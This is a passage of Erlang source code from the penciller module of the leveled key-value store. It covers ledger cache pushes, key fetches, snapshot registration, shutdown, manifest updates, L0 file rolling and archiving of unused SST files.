    L0Size = State#state.levelzero_size,
    %% The clerk is prompted into action as there may be a L0 write required
    ok = leveled_pclerk:clerk_prompt(State#state.clerk),
    case L0Pending or WorkBacklog or CacheAlreadyFull of
        true ->
            %% The Bookie must now retain the ledger cache and try to push
            %% the updated cache later
            leveled_log:log(
                p0018,
                [L0Size, L0Pending, WorkBacklog, CacheAlreadyFull]),
            {reply, returned, State};
        false ->
            %% Return ok as cache has been updated on State and the Bookie
            %% should clear its ledger cache which is now with the Penciller
            PushedTree =
                case is_tuple(LedgerTable) of
                    true ->
                        LedgerTable;
                    false ->
                        leveled_tree:from_orderedset(LedgerTable, ?CACHE_TYPE)
                end,
            case leveled_pmem:add_to_cache(
                    L0Size,
                    {PushedTree, MinSQN, MaxSQN},
                    State#state.ledger_sqn,
                    State#state.levelzero_cache,
                    true) of
                empty_push ->
                    {reply, ok, State};
                {UpdMaxSQN, NewL0Size, UpdL0Cache} ->
                    UpdL0Index =
                        leveled_pmem:add_to_index(
                            PushedIdx,
                            State#state.levelzero_index,
                            length(State#state.levelzero_cache) + 1),
                    leveled_log:log_randomtimer(
                        p0031,
                        [NewL0Size, true, true, MinSQN, MaxSQN], SW, 0.1),
                    {reply,
                        ok,
                        State#state{
                            levelzero_cache = UpdL0Cache,
                            levelzero_size = NewL0Size,
                            levelzero_index = UpdL0Index,
                            ledger_sqn = UpdMaxSQN}}
            end
    end;
handle_call({fetch, Key, Hash, UseL0Index}, _From, State) ->
    %% Fetch the current value for a key, optionally using the levelzero
    %% index to avoid unnecessary checks of the levelzero cache
    L0Idx =
        case UseL0Index of
            true ->
                State#state.levelzero_index;
            false ->
                none
        end,
    R =
        timed_fetch_mem(
            Key, Hash, State#state.manifest,
            State#state.levelzero_cache, L0Idx,
            State#state.monitor),
    {reply, R, State};
handle_call({check_sqn, Key, Hash, SQN}, _From, State) ->
    %% Compare the latest SQN found for the key with the SQN given, to
    %% answer current, replaced or missing
    {reply,
        compare_to_sqn(
            fetch_sqn(
                Key,
                Hash,
                State#state.manifest,
                State#state.levelzero_cache,
                State#state.levelzero_index),
            SQN),
        State};
handle_call({fetch_keys,
                    StartKey, EndKey,
                    AccFun, InitAcc,
                    SegmentList, LastModRange, MaxKeys, By},
                _From,
                State=#state{snapshot_fully_loaded=Ready})
                                                        when Ready == true ->
    %% Run a range query - only answered by a snapshot whose in-memory view
    %% has been fully loaded
    LastModRange0 =
        case LastModRange of
            false ->
                ?OPEN_LASTMOD_RANGE;
            R ->
                R
        end,
    SW = os:timestamp(),
    %% Produce the in-memory view as a list; a snapshot registered with a
    %% query range will already have a pre-merged tree (levelzero_astree)
    L0AsList =
        case State#state.levelzero_astree of
            undefined ->
                leveled_pmem:merge_trees(StartKey,
                                            EndKey,
                                            State#state.levelzero_cache,
                                            leveled_tree:empty(?CACHE_TYPE));
            List ->
                List
        end,
    %% If a segment list is given, filter the in-memory view to only those
    %% keys whose segment hash matches a segment in the list
    FilteredL0 =
        case SegmentList of
            false ->
                L0AsList;
            _ ->
                TunedList = leveled_sst:tune_seglist(SegmentList),
                FilterFun =
                    fun(LKV) ->
                        CheckSeg =
                            leveled_sst:extract_hash(
                                leveled_codec:strip_to_segmentonly(LKV)),
                        leveled_sst:member_check(CheckSeg, TunedList)
                    end,
                lists:filter(FilterFun, L0AsList)
        end,
    leveled_log:log_randomtimer(
        p0037, [State#state.levelzero_size], SW, 0.01),
    %% A query-registered snapshot carries a reduced manifest, usable only
    %% when the requested range sits within the registered range
    SSTiter =
        case State#state.query_manifest of
            undefined ->
                leveled_pmanifest:query_manifest(
                    State#state.manifest, StartKey, EndKey);
            {QueryManifest, StartKeyQM, EndKeyQM}
                    when StartKey >= StartKeyQM, EndKey =< EndKeyQM ->
                QueryManifest
        end,
    SnapshotTime = State#state.snapshot_time,
    %% Wrap the fold so it can be run either by this process (as_pcl) or
    %% handed back to be run by the caller (by_runner)
    Folder =
        fun() ->
            keyfolder({FilteredL0, SSTiter},
                        {StartKey, EndKey},
                        {AccFun, InitAcc, SnapshotTime},
                        {SegmentList, LastModRange0, MaxKeys})
        end,
    case By of
        as_pcl ->
            {reply, Folder(), State};
        by_runner ->
            {reply, Folder, State}
    end;
handle_call(get_startup_sqn, _From, State) ->
    {reply, State#state.persisted_sqn, State};
handle_call({register_snapshot, Snapshot, Query, BookiesMem, LongRunning},
                _From, State) ->
    %% Register and load a snapshot, merging the bookie's in-memory cache
    %% into the cloned state.  If the snapshot is to be used over a range
    %% of (StartKey, EndKey) - this will avoid a full copy of the penciller's
    %% memory, pre-merging only the keys within the query range.
    TimeO =
        case LongRunning of
            true ->
                State#state.snaptimeout_long;
            false ->
                State#state.snaptimeout_short
        end,
    Manifest0 =
        leveled_pmanifest:add_snapshot(State#state.manifest, Snapshot, TimeO),
    {BookieIncrTree, BookieIdx, MinSQN, MaxSQN} = BookiesMem,
    LM1Cache =
        case BookieIncrTree of
            empty_cache ->
                leveled_tree:empty(?CACHE_TYPE);
            _ ->
                BookieIncrTree
        end,
    {CloneState, ManifestClone, QueryManifest} =
        case Query of
            no_lookup ->
                %% Clone the full cache, but no levelzero index is built for
                %% a no_lookup snapshot
                {UpdMaxSQN, UpdSize, L0Cache} =
                    leveled_pmem:add_to_cache(
                        State#state.levelzero_size,
                        {LM1Cache, MinSQN, MaxSQN},
                        State#state.ledger_sqn,
                        State#state.levelzero_cache,
                        false),
                {#state{levelzero_cache = L0Cache,
                            ledger_sqn = UpdMaxSQN,
                            levelzero_size = UpdSize,
                            persisted_sqn = State#state.persisted_sqn},
                    leveled_pmanifest:copy_manifest(State#state.manifest),
                    undefined};
            {StartKey, EndKey} ->
                %% Range-bound snapshot - pre-merge the in-memory view for
                %% the range, and reduce the manifest to the query range
                SW = os:timestamp(),
                L0AsTree =
                    leveled_pmem:merge_trees(StartKey,
                                                EndKey,
                                                State#state.levelzero_cache,
                                                LM1Cache),
                leveled_log:log_randomtimer(
                    p0037, [State#state.levelzero_size], SW, 0.01),
                {#state{levelzero_astree = L0AsTree,
                            ledger_sqn = MaxSQN,
                            persisted_sqn = State#state.persisted_sqn},
                    undefined,
                    {leveled_pmanifest:query_manifest(
                        State#state.manifest, StartKey, EndKey),
                        StartKey,
                        EndKey}};
            undefined ->
                %% Clone the full cache, and also clone the levelzero index
                %% so the snapshot can serve key lookups
                {UpdMaxSQN, UpdSize, L0Cache} =
                    leveled_pmem:add_to_cache(
                        State#state.levelzero_size,
                        {LM1Cache, MinSQN, MaxSQN},
                        State#state.ledger_sqn,
                        State#state.levelzero_cache,
                        false),
                LM1Idx =
                    case BookieIdx of
                        empty_index ->
                            leveled_pmem:new_index();
                        _ ->
                            BookieIdx
                    end,
                L0Index =
                    leveled_pmem:add_to_index(
                        LM1Idx, State#state.levelzero_index, length(L0Cache)),
                {#state{levelzero_cache = L0Cache,
                            levelzero_index = L0Index,
                            levelzero_size = UpdSize,
                            ledger_sqn = UpdMaxSQN,
                            persisted_sqn = State#state.persisted_sqn},
                    leveled_pmanifest:copy_manifest(State#state.manifest),
                    undefined}
        end,
    {reply,
        {ok,
            CloneState#state{snapshot_fully_loaded = true,
                                snapshot_time = leveled_util:integer_now(),
                                manifest = ManifestClone,
                                query_manifest = QueryManifest}},
        State#state{manifest = Manifest0}};
handle_call(close, _From, State=#state{is_snapshot=Snap}) when Snap == true ->
    %% Closing a snapshot only requires releasing it from the source
    ok = pcl_releasesnapshot(State#state.source_penciller, self()),
    {stop, normal, ok, State};
handle_call(close, _From, State) ->
    %% Level 0 files lie outside of the manifest, and so if there is a
    %% levelzero cache but no L0 persistence pending, roll the cache to a
    %% L0 file before shutting down (otherwise this part of the ledger is
    %% lost and must be recovered from the journal at next startup).
    ok = leveled_pclerk:clerk_close(State#state.clerk),
    leveled_log:log(p0008, [close]),
    L0Left = State#state.levelzero_size > 0,
    case (not State#state.levelzero_pending and L0Left) of
        true ->
            Man0 = State#state.manifest,
            {Constructor, _} =
                roll_memory(
                    leveled_pmanifest:get_manifest_sqn(Man0) + 1,
                    State#state.ledger_sqn,
                    State#state.root_path,
                    State#state.levelzero_cache,
                    length(State#state.levelzero_cache),
                    State#state.sst_options,
                    true),
            ok = leveled_sst:sst_close(Constructor);
        false ->
            leveled_log:log(p0010, [State#state.levelzero_size])
    end,
    shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
    {stop, normal, ok, State};
handle_call(doom, _From, State) ->
    %% As close, but without persisting the levelzero cache - replying with
    %% the paths that the caller may erase
    leveled_log:log(p0030, []),
    ok = leveled_pclerk:clerk_close(State#state.clerk),
    shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
    ManifestFP = State#state.root_path ++ "/" ++ ?MANIFEST_FP ++ "/",
    FilesFP = State#state.root_path ++ "/" ++ ?FILES_FP ++ "/",
    {stop, normal, {ok, [ManifestFP, FilesFP]}, State};
handle_call({checkbloom_fortest, Key, Hash}, _From, State) ->
    %% Fold over levels 0..?MAX_LEVELS, short-circuiting once any file's
    %% bloom reports the hash (see pcl_checkbloomtest/2)
    Manifest = State#state.manifest,
    FoldFun =
        fun(Level, Acc) ->
            case Acc of
                true ->
                    true;
                false ->
                    case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
                        false ->
                            false;
                        FP ->
                            leveled_pmanifest:check_bloom(Manifest, FP, Hash)
                    end
            end
        end,
    {reply, lists:foldl(FoldFun, false, lists:seq(0, ?MAX_LEVELS)), State};
handle_call(check_for_work, _From, State) ->
    {_WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
    {reply, WC > 0, State};
handle_call(persisted_sqn, _From, State) ->
    {reply, State#state.persisted_sqn, State}.
handle_cast({manifest_change, Manifest}, State) ->
    %% The clerk has completed merge work and produced a new manifest
    NewManSQN = leveled_pmanifest:get_manifest_sqn(Manifest),
    OldManSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest),
    leveled_log:log(p0041, [OldManSQN, NewManSQN]),
    %% Only safe to update the manifest if the SQN increments
    if NewManSQN > OldManSQN ->
        ok =
            leveled_pclerk:clerk_promptdeletions(State#state.clerk, NewManSQN),
        UpdManifest0 =
            leveled_pmanifest:merge_snapshot(State#state.manifest, Manifest),
        %% Clear any removals/releases deferred whilst the work was ongoing
        UpdManifest1 =
            leveled_pmanifest:clear_pending(
                UpdManifest0,
                lists:usort(State#state.pending_removals),
                State#state.maybe_release),
        {noreply,
            State#state{
                manifest=UpdManifest1,
                pending_removals = [],
                maybe_release = false,
                work_ongoing=false}}
    end;
handle_cast({release_snapshot, Snapshot}, State) ->
    %% A clone has finished - release it from the manifest register
    Manifest0 = leveled_pmanifest:release_snapshot(State#state.manifest,
                                                    Snapshot),
    leveled_log:log(p0003, [Snapshot]),
    {noreply, State#state{manifest=Manifest0}};
handle_cast({confirm_delete, PDFN, FilePid}, State=#state{is_snapshot=Snap})
                                                        when Snap == false ->
    %% This is a two stage process.  A file that is ready for deletion is
    %% only confirmed back to the file process when ready_to_delete; and the
    %% clearing of the manifest is deferred (pending_removals/maybe_release)
    %% whilst merge work is ongoing.
    case leveled_pmanifest:ready_to_delete(State#state.manifest, PDFN) of
        true ->
            leveled_log:log(p0005, [PDFN]),
            ok = leveled_sst:sst_deleteconfirmed(FilePid),
            case State#state.work_ongoing of
                true ->
                    {noreply,
                        State#state{
                            pending_removals =
                                [PDFN|State#state.pending_removals]}};
                false ->
                    %% No work ongoing - safe to clear the manifest now
                    UpdManifest =
                        leveled_pmanifest:clear_pending(
                            State#state.manifest,
                            [PDFN],
                            false),
                    {noreply,
                        State#state{manifest = UpdManifest}}
            end;
        false ->
            case State#state.work_ongoing of
                true ->
                    {noreply, State#state{maybe_release = true}};
                false ->
                    UpdManifest =
                        leveled_pmanifest:clear_pending(
                            State#state.manifest,
                            [],
                            true),
                    {noreply,
                        State#state{manifest = UpdManifest}}
            end
    end;
handle_cast({levelzero_complete, FN, StartKey, EndKey, Bloom}, State) ->
    %% The L0 writer has completed persisting the levelzero cache - add the
    %% new file into the manifest at level 0 and reset the in-memory cache
    leveled_log:log(p0029, []),
    ManEntry = #manifest_entry{start_key=StartKey,
                                end_key=EndKey,
                                owner=State#state.levelzero_constructor,
                                filename=FN,
                                bloom=Bloom},
    ManifestSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest) + 1,
    UpdMan = leveled_pmanifest:insert_manifest_entry(State#state.manifest,
                                                        ManifestSQN,
                                                        0,
                                                        ManEntry),
    %% Prompt clerk to ask about work - do this for every L0 roll
    ok = leveled_pclerk:clerk_prompt(State#state.clerk),
    {noreply, State#state{levelzero_cache=[],
                            levelzero_index=[],
                            levelzero_pending=false,
                            levelzero_constructor=undefined,
                            levelzero_size=0,
                            manifest=UpdMan,
                            persisted_sqn=State#state.ledger_sqn}};
handle_cast(work_for_clerk, State) ->
    %% Decide what work (if any) should be handed to the clerk, or whether
    %% the levelzero cache should be rolled to a new L0 file
    case {(State#state.levelzero_pending or State#state.work_ongoing),
            leveled_pmanifest:levelzero_present(State#state.manifest)} of
        {true, _L0Present} ->
            %% Work is currently blocked by ongoing activity
            {noreply, State};
        {false, true} ->
            %% If L0 present, and no work ongoing - dropping L0 to L1 is the
            %% priority
            ok = leveled_pclerk:clerk_push(
                State#state.clerk, {0, State#state.manifest}),
            {noreply, State#state{work_ongoing=true}};
        {false, false} ->
            CacheOverSize =
                maybe_cache_too_big(
                    State#state.levelzero_size,
                    State#state.levelzero_maxcachesize,
                    State#state.levelzero_cointoss),
            CacheAlreadyFull =
                leveled_pmem:cache_full(State#state.levelzero_cache),
            {WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
            case {WC, (CacheAlreadyFull or CacheOverSize)} of
                {0, false} ->
                    %% No work outstanding and cache not full
                    {noreply, State#state{work_backlog = false}};
                {WC, true} when WC < ?WORKQUEUE_BACKLOG_TOLERANCE ->
                    %% Rolling the memory to create a new Level Zero file
                    NextSQN =
                        leveled_pmanifest:get_manifest_sqn(
                            State#state.manifest) + 1,
                    {Constructor, none} =
                        roll_memory(
                            NextSQN,
                            State#state.ledger_sqn,
                            State#state.root_path,
                            none,
                            length(State#state.levelzero_cache),
                            State#state.sst_options,
                            false),
                    {noreply,
                        State#state{
                            levelzero_pending = true,
                            levelzero_constructor = Constructor,
                            work_backlog = false}};
                {WC, L0Full} ->
                    %% Merge work is pushed ahead of rolling memory when a
                    %% backlog of work exists
                    Backlog = WC >= ?WORKQUEUE_BACKLOG_TOLERANCE,
                    leveled_log:log(p0024, [WC, Backlog, L0Full]),
                    [TL|_Tail] = WL,
                    ok =
                        leveled_pclerk:clerk_push(
                            State#state.clerk, {TL, State#state.manifest}),
                    {noreply,
                        State#state{
                            work_backlog = Backlog, work_ongoing = true}}
            end
    end;
handle_cast({fetch_levelzero, Slot, ReturnFun}, State) ->
    %% Return a single slot of the levelzero cache to the L0 file writer
    ReturnFun(lists:nth(Slot, State#state.levelzero_cache)),
    {noreply, State};
handle_cast({log_level, LogLevel}, State) ->
    %% Change log level for the penciller, its clerk, and (via sst_options)
    %% any SST files subsequently opened
    PC = State#state.clerk,
    ok = leveled_pclerk:clerk_loglevel(PC, LogLevel),
    ok = leveled_log:set_loglevel(LogLevel),
    SSTopts = State#state.sst_options,
    SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
    {noreply, State#state{sst_options = SSTopts0}};
handle_cast({add_logs, ForcedLogs}, State) ->
    %% Add forced logs (logged irrespective of level)
    PC = State#state.clerk,
    ok = leveled_pclerk:clerk_addlogs(PC, ForcedLogs),
    ok = leveled_log:add_forcedlogs(ForcedLogs),
    SSTopts = State#state.sst_options,
    SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
    {noreply, State#state{sst_options = SSTopts0}};
handle_cast({remove_logs, ForcedLogs}, State) ->
    %% Remove previously forced logs
    PC = State#state.clerk,
    ok = leveled_pclerk:clerk_removelogs(PC, ForcedLogs),
    ok = leveled_log:remove_forcedlogs(ForcedLogs),
    SSTopts = State#state.sst_options,
    SSTopts0 = SSTopts#sst_options{log_options = leveled_log:get_opts()},
    {noreply, State#state{sst_options = SSTopts0}}.
%% The bookie that requested this snapshot has gone down - release the
%% snapshot so the source penciller can clear its file references.
handle_info({'DOWN', BookieMonRef, process, _BookiePid, _Info},
                State=#state{bookie_monref = BookieMonRef}) ->
    ok = pcl_releasesnapshot(State#state.source_penciller, self()),
    {stop, normal, State};
handle_info(_Info, State) ->
    {noreply, State}.
terminate(Reason, _State=#state{is_snapshot=Snap}) when Snap == true ->
    leveled_log:log(p0007, [Reason]);
terminate(Reason, _State) ->
    leveled_log:log(p0011, [Reason]).

%% Redact the bulky in-memory parts of the state from termination reports
format_status(normal, [_PDict, State]) ->
    State;
format_status(terminate, [_PDict, State]) ->
    State#state{manifest = redacted,
                levelzero_cache = redacted,
                levelzero_index = redacted,
                levelzero_astree = redacted}.

code_change(_OldVsn, State, _Extra) ->
    {ok, State}.
%% Return the path under which SST ledger files are stored, ensuring the
%% directory exists.
sst_rootpath(RootPath) ->
    LedgerFilesPath = RootPath ++ "/" ++ ?FILES_FP,
    filelib:ensure_dir(LedgerFilesPath ++ "/"),
    LedgerFilesPath.
%% Generate the filename for a SST file from the manifest SQN, the level and
%% a file count.
sst_filename(ManSQN, Level, Count) ->
    NameFormat = "./~w_~w_~w" ++ ?SST_FILEX,
    lists:flatten(io_lib:format(NameFormat, [ManSQN, Level, Count])).
Internal functions
-spec start_from_file(penciller_options()) -> {ok, pcl_state()}.
%% @doc
%% Normal (non-snapshot) start of a penciller: load the persisted manifest,
%% open the SST files it references, and roll forward any L0 file found on
%% disk but not yet recorded in the manifest.
start_from_file(PCLopts) ->
    RootPath = PCLopts#penciller_options.root_path,
    MaxTableSize = PCLopts#penciller_options.max_inmemory_tablesize,
    OptsSST = PCLopts#penciller_options.sst_options,
    Monitor = PCLopts#penciller_options.monitor,
    SnapTimeoutShort = PCLopts#penciller_options.snaptimeout_short,
    SnapTimeoutLong = PCLopts#penciller_options.snaptimeout_long,
    {ok, MergeClerk} = leveled_pclerk:clerk_new(self(), RootPath, OptsSST),
    CoinToss = PCLopts#penciller_options.levelzero_cointoss,
    %% Used to randomly defer the writing of a L0 file.  Intended to help
    %% when many stores might otherwise all attempt to write level zero
    %% concurrently
    InitState = #state{clerk = MergeClerk,
                        root_path = RootPath,
                        levelzero_maxcachesize = MaxTableSize,
                        levelzero_cointoss = CoinToss,
                        levelzero_index = [],
                        snaptimeout_short = SnapTimeoutShort,
                        snaptimeout_long = SnapTimeoutLong,
                        sst_options = OptsSST,
                        monitor = Monitor},
    %% Open the manifest, then each SST file referenced by it
    Manifest0 = leveled_pmanifest:open_manifest(RootPath),
    OpenFun =
        fun(FN, Level) ->
            {ok, Pid, {_FK, _LK}, Bloom} =
                leveled_sst:sst_open(sst_rootpath(RootPath),
                                        FN, OptsSST, Level),
            {Pid, Bloom}
        end,
    SQNFun = fun leveled_sst:sst_getmaxsequencenumber/1,
    {MaxSQN, Manifest1, FileList} =
        leveled_pmanifest:load_manifest(Manifest0, OpenFun, SQNFun),
    leveled_log:log(p0014, [MaxSQN]),
    ManSQN = leveled_pmanifest:get_manifest_sqn(Manifest1),
    leveled_log:log(p0035, [ManSQN]),
    %% Find any L0 files
    L0FN = sst_filename(ManSQN + 1, 0, 0),
    {State0, FileList0} =
        case filelib:is_file(filename:join(sst_rootpath(RootPath), L0FN)) of
            true ->
                %% A L0 file was written but not recorded in the manifest -
                %% open it and insert it as a new level 0 manifest entry
                leveled_log:log(p0015, [L0FN]),
                L0Open = leveled_sst:sst_open(sst_rootpath(RootPath),
                                                L0FN,
                                                OptsSST,
                                                0),
                {ok, L0Pid, {L0StartKey, L0EndKey}, Bloom} = L0Open,
                L0SQN = leveled_sst:sst_getmaxsequencenumber(L0Pid),
                L0Entry = #manifest_entry{start_key = L0StartKey,
                                            end_key = L0EndKey,
                                            filename = L0FN,
                                            owner = L0Pid,
                                            bloom = Bloom},
                Manifest2 =
                    leveled_pmanifest:insert_manifest_entry(Manifest1,
                                                            ManSQN + 1,
                                                            0,
                                                            L0Entry),
                leveled_log:log(p0016, [L0SQN]),
                LedgerSQN = max(MaxSQN, L0SQN),
                {InitState#state{manifest = Manifest2,
                                    ledger_sqn = LedgerSQN,
                                    persisted_sqn = LedgerSQN},
                    [L0FN|FileList]};
            false ->
                leveled_log:log(p0017, []),
                {InitState#state{manifest = Manifest1,
                                    ledger_sqn = MaxSQN,
                                    persisted_sqn = MaxSQN},
                    FileList}
        end,
    %% Archive any on-disk file not in the list of loaded files
    ok = archive_files(RootPath, FileList0),
    {ok, State0}.
-spec shutdown_manifest(leveled_pmanifest:manifest(), pid()|undefined) -> ok.
%% Shutdown all the SST files within the manifest
%% Close every SST process referenced from the manifest, then apply the same
%% close to the L0 constructor.  Manifest entries may be manifest_entry
%% records, {StartKey, Entry} tuples, or (for the L0 case) a bare pid or
%% undefined; owners that are already dead are skipped.
shutdown_manifest(Manifest, L0Constructor) ->
    EntryCloseFun =
        fun(ME) ->
            %% Resolve the owning SST pid from whichever shape the entry
            %% takes; the final `ME -> ME` clause passes through a raw
            %% pid/undefined unchanged
            Owner =
                case is_record(ME, manifest_entry) of
                    true ->
                        ME#manifest_entry.owner;
                    false ->
                        case ME of
                            {_SK, ME0} ->
                                ME0#manifest_entry.owner;
                            ME ->
                                ME
                        end
                end,
            ok =
                case check_alive(Owner) of
                    true ->
                        leveled_sst:sst_close(Owner);
                    false ->
                        ok
                end
        end,
    leveled_pmanifest:close_manifest(Manifest, EntryCloseFun),
    EntryCloseFun(L0Constructor).
-spec check_alive(pid()|undefined) -> boolean().
%% True only when Owner is a pid referring to a currently-live local
%% process; any non-pid value (e.g. undefined) is treated as not alive.
check_alive(Owner) ->
    is_pid(Owner) andalso is_process_alive(Owner).
-spec archive_files(list(), list()) -> ok.
%% Archive any sst files in the folder that have not been used to build the
%% ledger at startup
%% Rename every *.sst file in the SST folder that is not in UsedFileList to
%% use the archive extension, so unused files are retained (not deleted) but
%% will not be re-opened.
archive_files(RootPath, UsedFileList) ->
    {ok, AllFiles} = file:list_dir(sst_rootpath(RootPath)),
    FileCheckFun =
        fun(FN, UnusedFiles) ->
            %% UsedFileList entries are of the "./name.sst" relative form,
            %% so normalise the directory listing to match
            FN0 = "./" ++ FN,
            case filename:extension(FN0) of
                ?SST_FILEX ->
                    case lists:member(FN0, UsedFileList) of
                        true ->
                            UnusedFiles;
                        false ->
                            leveled_log:log(p0040, [FN0]),
                            [FN0|UnusedFiles]
                    end;
                _ ->
                    %% Non-SST files (e.g. already-archived) are ignored
                    UnusedFiles
            end
        end,
    RenameFun =
        fun(FN) ->
            AltName = filename:join(sst_rootpath(RootPath),
                                    filename:basename(FN, ?SST_FILEX))
                        ++ ?ARCHIVE_FILEX,
            file:rename(filename:join(sst_rootpath(RootPath), FN),
                        AltName)
        end,
    FilesToArchive = lists:foldl(FileCheckFun, [], AllFiles),
    lists:foreach(RenameFun, FilesToArchive),
    ok.
-spec maybe_cache_too_big(
pos_integer(), pos_integer(), boolean()) -> boolean().
%% The CoinToss may be used to randomly defer rolling the cache, to spread
%% load where there are multiple leveled instances on one machine.
%% Decide whether the L0 cache should now be rolled.  The cache must exceed
%% L0MaxSize; with CoinToss enabled the decision is additionally randomised
%% (1-in-?COIN_SIDECOUNT chance per check) unless the cache is much too big
%% (over twice the max, capped by ?SUPER_MAX_TABLE_SIZE), at which point the
%% roll is forced regardless of the toss.
maybe_cache_too_big(NewL0Size, L0MaxSize, CoinToss) ->
    CacheTooBig = NewL0Size > L0MaxSize,
    CacheMuchTooBig =
        NewL0Size > min(?SUPER_MAX_TABLE_SIZE, 2 * L0MaxSize),
    RandomFactor =
        case CoinToss of
            true ->
                case leveled_rand:uniform(?COIN_SIDECOUNT) of
                    1 ->
                        true;
                    _ ->
                        false
                end;
            false ->
                true
        end,
    CacheTooBig and (RandomFactor or CacheMuchTooBig).
-spec roll_memory(
pos_integer(), non_neg_integer(), string(),
levelzero_cache()|none, pos_integer(),
sst_options(), boolean())
-> {pid(), leveled_ebloom:bloom()|none}.
%% Roll the in-memory cache into a L0 file.  If this is done synchronously,
%% the penciller will be blocked until the file write completes.
%% Casting a large object (the levelzero cache) to the SST file does not lead
%% to an immediate return.  With 32K keys in the TreeList it could take around
%% 35-40ms due to the overheads of copying.
%% To avoid blocking the penciller, the SST file can request each item of the
%% cache individually via a fetch fun (the asynchronous first clause).
%% First clause: asynchronous roll - the new SST file pulls cache slots from
%% this penciller one at a time via pcl_fetchlevelzero, no bloom returned
%% yet.  Second clause: synchronous roll - the full KV list is materialised
%% here and written in one call, returning the bloom immediately.
roll_memory(NextManSQN, LedgerSQN, RootPath, none, CL, SSTOpts, false) ->
    L0Path = sst_rootpath(RootPath),
    L0FN = sst_filename(NextManSQN, 0, 0),
    leveled_log:log(p0019, [L0FN, LedgerSQN]),
    PCL = self(),
    FetchFun =
        fun(Slot, ReturnFun) -> pcl_fetchlevelzero(PCL, Slot, ReturnFun) end,
    {ok, Constructor, _} =
        leveled_sst:sst_newlevelzero(
            L0Path, L0FN, CL, FetchFun, PCL, LedgerSQN, SSTOpts),
    {Constructor, none};
roll_memory(NextManSQN, LedgerSQN, RootPath, L0Cache, CL, SSTOpts, true) ->
    L0Path = sst_rootpath(RootPath),
    L0FN = sst_filename(NextManSQN, 0, 0),
    FetchFun = fun(Slot) -> lists:nth(Slot, L0Cache) end,
    KVList = leveled_pmem:to_list(CL, FetchFun),
    {ok, Constructor, _, Bloom} =
        leveled_sst:sst_new(
            L0Path, L0FN, 0, KVList, LedgerSQN, SSTOpts),
    {Constructor, Bloom}.
-spec timed_fetch_mem(
tuple(),
{integer(), integer()},
leveled_pmanifest:manifest(), list(),
leveled_pmem:index_array(),
leveled_monitor:monitor()) -> leveled_codec:ledger_kv()|not_found.
%% Fetch the key from the in-memory level-zero cache first, and if it is not
%% found looking down level by level through the LSM tree - timing the fetch.
%% Fetch via fetch_mem/6 using the timed SST getter, recording the elapsed
%% time (and whether the key was absent) against the monitor.
timed_fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, Monitor) ->
    SW0 = leveled_monitor:maybe_time(Monitor),
    {R, Level} =
        fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun timed_sst_get/4),
    {TS0, _SW1} = leveled_monitor:step_time(SW0),
    maybelog_fetch_timing(Monitor, Level, TS0, R == not_present),
    R.
-spec fetch_sqn(
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
leveled_pmanifest:manifest(),
list(),
leveled_pmem:index_array()) ->
not_present|leveled_codec:ledger_kv()|leveled_codec:ledger_sqn().
%% Fetch only the sequence number for the key, checking the in-memory cache
%% and if it is not found looking down level by level through the LSM tree.
%% As fetch_mem/6 but using the SQN-only SST getter; the level element of
%% the result is discarded.
fetch_sqn(Key, Hash, Manifest, L0Cache, L0Index) ->
    R = fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, fun sst_getsqn/4),
    element(1, R).
%% Check the level-zero cache for the key first - using the L0 index to
%% narrow the cache positions to check when one is present - and on a miss
%% fall through to the persisted LSM tree starting at Level 0.  Returns
%% {Result, Level} where Level is the atom 'memory' for a cache hit.
fetch_mem(Key, Hash, Manifest, L0Cache, L0Index, FetchFun) ->
    PosList =
        case L0Index of
            none ->
                %% No index - every cache slot must be checked
                lists:seq(1, length(L0Cache));
            _ ->
                leveled_pmem:check_index(Hash, L0Index)
        end,
    L0Check = leveled_pmem:check_levelzero(Key, Hash, PosList, L0Cache),
    case L0Check of
        {false, not_found} ->
            fetch(Key, Hash, Manifest, 0, FetchFun);
        {true, KV} ->
            {KV, memory}
    end.
-spec fetch(tuple(), {integer(), integer()},
leveled_pmanifest:manifest(), integer(),
sst_fetchfun()) -> {tuple()|not_present, integer()|basement}.
%% Fetch from the persisted portion of the LSM tree, checking each level in
%% turn until the key is found or the basement is passed.
%% Recurse down the levels; stop with {not_present, basement} once below
%% ?MAX_LEVELS.  At each level the manifest is consulted for a candidate
%% file, the file's bloom filter is checked before paying for the file
%% fetch, and a file-level miss falls through to the next level.
fetch(_Key, _Hash, _Manifest, ?MAX_LEVELS + 1, _FetchFun) ->
    {not_present, basement};
fetch(Key, Hash, Manifest, Level, FetchFun) ->
    case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
        false ->
            %% No file covers this key at this level
            fetch(Key, Hash, Manifest, Level + 1, FetchFun);
        FP ->
            case leveled_pmanifest:check_bloom(Manifest, FP, Hash) of
                true ->
                    case FetchFun(FP, Key, Hash, Level) of
                        not_present ->
                            fetch(Key, Hash, Manifest, Level + 1, FetchFun);
                        ObjectFound ->
                            {ObjectFound, Level}
                    end;
                false ->
                    %% Bloom filter rules the key out of this file
                    fetch(Key, Hash, Manifest, Level + 1, FetchFun)
            end
    end.
%% SST get wrapped with a wall-clock timing, handing the elapsed microseconds
%% to log_slowfetch so slow fetches are logged against ?SLOW_FETCH.
timed_sst_get(PID, Key, Hash, Level) ->
    SW = os:timestamp(),
    R = leveled_sst:sst_get(PID, Key, Hash),
    T0 = timer:now_diff(os:timestamp(), SW),
    log_slowfetch(T0, R, PID, Level, ?SLOW_FETCH).
%% SQN-only SST getter; the Level argument exists only to match the
%% sst_fetchfun() arity and is unused.
sst_getsqn(PID, Key, Hash, _Level) ->
    leveled_sst:sst_getsqn(PID, Key, Hash).
%% Return R, logging pc016 when the fetch took at least FetchTolerance
%% microseconds.  Note R is already bound, so the first case clause
%% {T, R} always matches on the second element - it only tests T.
log_slowfetch(T0, R, PID, Level, FetchTolerance) ->
    case {T0, R} of
        {T, R} when T < FetchTolerance ->
            %% Fast enough - no logging
            R;
        {T, not_present} ->
            leveled_log:log(pc016, [PID, T, Level, not_present]),
            not_present;
